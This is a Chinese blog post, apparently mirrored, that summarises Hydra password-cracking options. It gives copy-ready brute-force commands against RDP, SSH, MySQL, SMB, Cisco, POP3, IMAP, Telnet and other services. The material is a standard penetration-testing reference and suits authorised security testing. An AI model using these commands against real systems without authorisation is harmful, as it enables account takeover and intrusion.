zoukankan      html  css  js  c++  java
  • 【渗透测试】hydra使用小结

     1 -R:继续从上一次进度接着破解
     2 -S:大写,采用SSL链接
     3 -s <PORT>:小写,可通过这个参数指定非默认端口
     4 -l <LOGIN>:指定破解的用户,对特定用户破解
     5 -L <FILE>:指定用户名字典
     6 -p <PASS>:小写,指定密码破解,少用,一般是采用密码字典
     7 -P <FILE>:大写,指定密码字典
     8 -e <ns>:可选选项,n:空密码试探,s:使用指定用户和密码试探
     9 -C <FILE>:使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
    10 -M <FILE>:指定目标列表文件一行一条
    11 -o <FILE>:指定结果输出文件
    12 -f:在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
    13 -t <TASKS>:同时运行的线程数,默认为16
    14 -w <TIME>:设置最大超时的时间,单位秒,默认是30s
    15 -v / -V:显示详细过程
    16 -o 可导出文件
    17 server:目标ip 
    18 ------------------------------------------------------------------------------
    19     破解rdp(3389):
    20 # hydra -l administrator -P password.txt -V IP rdp
    21     破解mysql:
    22 # hydra ip -L 用户名 -P pass.txt -V mysql
    23     破解ssh:
    24 # hydra -L user.txt -P password.txt -e ns -vV IP ssh
    25     破解https:
    26 # hydra -m /index.php -l muts -P pass.txt IP https
    27     破解teamspeak:
    28 # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
    29     破解cisco:
    30 # hydra -P pass.txt IP cisco
    31 # hydra -m cloud -P pass.txt IP cisco-enable
    32     破解smb:
    33 # hydra -l administrator -P pass.txt IP smb
    34     破解pop3:
    35 # hydra -l muts -P pass.txt my.pop3.mail pop3
    36     破解http-proxy:
    37 # hydra -l admin -P pass.txt http-proxy://IP
    38     破解imap:
    39 # hydra -L user.txt -p secret IP imap PLAIN
    40 # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
    41     破解telnet
    42 # hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
  • 相关阅读:
    Backtrader中文笔记之Renko Bricks
    Renko Charts介绍
    Backtrader中文笔记之Cerebro(大脑)。
    Backtrader中文笔记之Operating the platform(操作平台)。
    Backtrader中文笔记之Platform Concepts(平台介绍)。
    Backtrader中文笔记_Quickstart。
    PyAlgoTrade 0.20中文笔记
    浅谈JS中 reduce() 的用法(转帖)
    Python websocket的示例(转帖)
    硬盘显示有容量,但无法放入文件,还有一个查看机器端口是否开放。
  • 原文地址:https://www.cnblogs.com/sqyysec/p/6750365.html
Copyright © 2011-2022 走看看